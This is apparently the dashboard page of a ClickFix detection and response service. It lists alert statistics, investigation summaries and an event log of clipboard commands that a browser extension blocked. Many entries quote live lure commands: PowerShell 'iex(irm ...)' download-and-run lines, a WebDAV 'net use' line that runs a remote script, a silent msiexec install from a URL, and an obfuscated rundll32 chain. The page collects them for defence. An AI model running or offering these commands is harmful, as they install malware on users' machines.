ClickFix Command Center

Deteccion, explicabilidad y respuesta en una sola superficie de control.

Fusión entre la versión anterior y la actual: inteligencia pública, operaciones privadas, investigación en grafo, listas de control y mensajería con la extensión.

Vista pública
Búsqueda forense

Filtra por dominio, comando, fecha y score para detectar patrones.

Operaciones

Actualiza revisión, bloquea dominios y manda casos a investigación.

Investigación

Construye grafos con nodos, relaciones, notas y evidencias compartibles.

Cobertura

Revisa fuentes de inteligencia, listas y configuracion de scoring.

Inicio rápido

Vista pública activa. Puedes consultar cobertura y buscar eventos; inicia Sesión para ejecutar acciones operativas.

  1. Revisa KPIs y alertas recientes.
  2. Filtra dominios/comandos sospechosos.
  3. Ejecuta bloqueo o abre investigación.

alertas totales

2294

bloqueos totales

1486

dominios únicos

1134

regiones monitorizadas

13

alertas 24h

2

bloqueos 24h

0

ratio bloqueo 24h

0.00%

alto riesgo 24h

0

nuevos dominios 24h

1

pend. fuera listas

119

revisadas

308

cobertura revisión

13.43%

sitios manuales

2

pend. revisión

1986

Último escaneo

Vista previa: Después llega desde la extensión al detectar alerta y Antes se genera en servidor (Site-Shot) tras recibir ese after.

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Antes

before scan

Despues

after scan

Investigaciones destacadas en Inicio

Las define admin desde Investigación. En la portada pública solo salen si también están compartidas en Público.

Investigacion alerta #1858 - socheaphost.com

graph #17 | dominio: socheaphost.com | verdict: malicious | report_id: 1858 | posición: 0

Investigacion generada desde alerta #1858.
Dominio: socheaphost.com
Fecha alerta: 2026-03-27T14:11:15+00:00
Score: 83/100
URL: https://socheaphost.com/IRS_SUPPORT/RemotePCHost_EgS2oOxh0WtodC9.exe
Mensaje: Detected snippet: "Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Blocked extension: .exe" Detected snippet: "Unfamiliar download host: socheaphost.com" Detected snippet: "Host matched blocklist." Detected snippet: "Runtime verdict: unsafe (83/100)" Detected snippet: "Models URL:0 Content:18 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Runtime reason: Blocked extension: .exe" Detected snippet: "Runtime reason: Unfamiliar download host: socheaphost.com" Detected snippet: "Runtime reason: Host matched blocklist." Confidence score: 83/100
Detectad
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1526 - iamdavidachom.com

graph #14 | dominio: iamdavidachom.com | verdict: investigating | report_id: 1526 | posición: 0

Investigacion generada desde alerta #1526.
Dominio: iamdavidachom.com
Fecha alerta: 2026-03-08T20:42:18+00:00
Score: 70/100
URL: https://iamdavidachom.com/?cfcw_captcha_page=1
Mensaje: Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "cmd /c net use Z: http://185.246.223.71/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete" Detected snippet: "Runtime verdict: unsafe (70/100)" Detected snippet: "Models URL:0 Content:35 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Detected snippet: "Runtime reason: Host appears in active blocklist." Clipboard blocked: "cmd /c net use Z: h

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1088 - guard-google.com

graph #6 | dominio: guard-google.com | verdict: investigating | report_id: 1088 | posición: 0

Investigacion generada desde alerta #1088.
Dominio: guard-google.com
Fecha alerta: 2026-03-08T16:32:18+00:00
Score: 0/100
URL: https://guard-google.com/
Mensaje: Manual user report

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

socheaphos.com

graph #8 | dominio: socheaphos.com | verdict: malicious | report_id: - | posición: 0

Sin resumen todavía.
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Investigacion alerta #1405 - winnipeglandscapingpros.com

graph #7 | dominio: winnipeglandscapingpros.com | verdict: investigating | report_id: 1405 | posición: 0

Investigacion generada desde alerta #1405.
Dominio: winnipeglandscapingpros.com
Fecha alerta: 2026-03-08T18:43:42+00:00
Score: 0/100
URL: https://winnipeglandscapingpros.com/
Mensaje: Manual user report
Abrir investigación Aun no es pública.

Antes

Sin captura aprobada antes.

Despues

Sin captura aprobada despues.

Events

Triage workspace with event feed, detail panel, and quick actions.

24h alerts 2 24h blocks 0 pending 1986
Selecciona un evento para ver el detalle enriquecido.
Eventos por dominio (agrupados)
DominioEventosImpactos (dup)BloqueosScore maxÚltima actividad
www.google.com 1 1 0 29/100 2026-07-28T09:18:49+00:00
cdn.southeastwater.co.uk 1 1 0 16/100 2026-07-27T16:49:16+00:00
fmi.univ-bba.dz 4 4 0 60/100 2026-07-26T15:41:39+00:00
articulateusercontent.com 2 2 0 16/100 2026-07-15T16:06:31+00:00
andrescuartero.cat 3 295 3 0/100 2026-07-14T07:07:42+00:00
www.ceipalandalus.net 4 4 0 53/100 2026-07-13T07:50:28+00:00
www.iesbeatrizdesuabia.es 1 1 0 26/100 2026-07-13T07:10:24+00:00
panel.findatreasure.uk 1 1 0 20/100 2026-07-12T12:50:28+00:00
www.aprenalvalles.cat 2 2 0 40/100 2026-07-10T12:05:03+00:00
interstate.myinvestment.properties 1 1 0 45/100 2026-07-10T12:05:03+00:00
Capturas web (before/after)

Último escaneo

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Antes

approved
before scan

Después

approved
after scan
Vista tabular clasica
FechaDominioMarcadoMensajeEstado
2026-07-28T09:18:49+00:00 www.google.com REINCIDENTE DOM x9 Suspicious command detected in the clipboard. Suspicious command pattern detected. Detected snippet: "Skip to main contentAccessibility help AI Mode All Forums Short videos Shopping More Upgrade why isn't my gardening webpage appearing in google natural searc..." Detected snippet: "Runtime verdict: low (19/100)" Detected snippet: "Models URL:0 Content:19 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "Skip to main contentAccessibility help AI Mode All Forums Short videos Shopping More Upgrade why isn't my gardening webpage appearing in google natural searc..." Confidence score: 29/100 pending
2026-07-27T16:49:16+00:00 cdn.southeastwater.co.uk - Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Sussex_and_West_Public_Notice_2026.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: cdn.southeastwater.co.uk" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions google but host is cdn.southeastwater.co.uk." Confidence score: 16/100 pending
2026-07-26T15:41:39+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/ec9bc3510ca9933c' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/ec9bc3510ca9933c' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/b02446900a43ae23' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/b02446900a43ae23' -UseBasicParsing)"; exit " Confidence score: 60/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/98b7ea7f07e2822f' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/98b7ea7f07e2822f' -UseBasicParsing)"; exit " Confidence score: 58/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/506b04d930d7b7ae' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/506b04d930d7b7ae' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-15T16:06:31+00:00 articulateusercontent.com - Se detectó contenido de comandos ofuscado o codificado. Fragmento detectado: "Non-HTML content probe (application/pdf)" Fragmento detectado: "Filename: nESSczrR2hBnpZk2.pdf" Fragmento detectado: "Extension: .pdf" Fragmento detectado: "Unfamiliar download host: articulateusercontent.com" Fragmento detectado: "Runtime verdict: low (0/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Puntuación de confianza: 16/100 pending
2026-07-15T15:36:31+00:00 articulateusercontent.com - Se detectó contenido de comandos ofuscado o codificado. Fragmento detectado: "Non-HTML content probe (application/pdf)" Fragmento detectado: "Filename: zV4zkZp5-NlNMaeH.pdf" Fragmento detectado: "Extension: .pdf" Fragmento detectado: "Unfamiliar download host: articulateusercontent.com" Fragmento detectado: "Runtime verdict: low (0/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Puntuación de confianza: 16/100 pending
2026-07-13T06:12:47+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-14T06:22:41+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-14T06:17:41+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-13T07:50:28+00:00 www.ceipalandalus.net - Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Aula-mediodia-con-enlaces.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: www.ceipalandalus.net" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is www.ceipalandalus.net." Confidence score: 10/100 pending
2026-07-13T07:35:26+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'blakcinwhitexn.cc/ae6e199d088a658b' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'blakcinwhitexn.cc/ae6e199d088a658b' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-13T07:10:24+00:00 www.iesbeatrizdesuabia.es - The page asks you to paste commands in CMD/PowerShell/Run. Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: TRATAMIENTO-DE-LA-LECTURA-2024-25.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: www.iesbeatrizdesuabia.es" Detected snippet: "Runtime verdict: low (16/100)" Detected snippet: "Models URL:0 Content:16 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Obfuscation/evasion pattern found." Confidence score: 26/100 pending
2026-07-12T12:50:28+00:00 panel.findatreasure.uk - Detected snippet: "Non-HTML content probe (text/html)" Detected snippet: "Filename: 8-es2015.e233d3d36ab69dad11a2.js" Detected snippet: "Extension: .js" Detected snippet: "Blocked extension: .js" Detected snippet: "Unfamiliar download host: panel.findatreasure.uk" Detected snippet: "Runtime verdict: low (20/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:20" Detected snippet: "Runtime reason: Download risk engine classified artifact as unsafe." Confidence score: 20/100 pending
2026-07-10T12:05:03+00:00 www.aprenalvalles.cat - Comando sospechoso detectado en el portapapeles. Patrón de comando sospechoso detectado. Fragmento detectado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\lwwu.1pishbini.com@SSL\4f894ac1-8d0b-4..." Fragmento detectado: "Runtime verdict: low (19/100)" Fragmento detectado: "Models URL:0 Content:19 Reputation:0 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Command execution pattern found." Fragmento detectado: "Runtime reason: Clipboard manipulation indicator found." Portapapeles bloqueado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\lwwu.1pishbini.com@SSL\4f894ac1-8d0b-4..." Puntuación de confianza: 40/100 pending
2026-07-10T12:05:03+00:00 www.aprenalvalles.cat - Comando sospechoso detectado en el portapapeles. Patrón de comando sospechoso detectado. Fragmento detectado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\nnny.1pishbini.com@SSL\90e13b17-94b8-4..." Fragmento detectado: "Runtime verdict: low (19/100)" Fragmento detectado: "Models URL:0 Content:19 Reputation:0 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Command execution pattern found." Fragmento detectado: "Runtime reason: Clipboard manipulation indicator found." Portapapeles bloqueado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\nnny.1pishbini.com@SSL\90e13b17-94b8-4..." Puntuación de confianza: 37/100 pending
2026-07-10T12:05:03+00:00 interstate.myinvestment.properties REINCIDENTE DOM x1 • Comando sospechoso detectado en el portapapeles. • Patrón de comando sospechoso detectado. • Fragmento detectado: "msiexec /i http://inkbookwriters.com/verify /qn" • Portapapeles bloqueado: "msiexec /i http://inkbookwriters.com/verify /qn" • Puntuación de confianza: 45/100 pending
2026-07-08T10:15:03+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/241289ab0aac232f' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/241289ab0aac232f' -UseBasicParsing)"; exit " Confidence score: 49/100 pending
2026-07-08T10:10:03+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/2b9a64efd6e6e681' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/2b9a64efd6e6e681' -UseBasicParsing)"; exit " Confidence score: 49/100 pending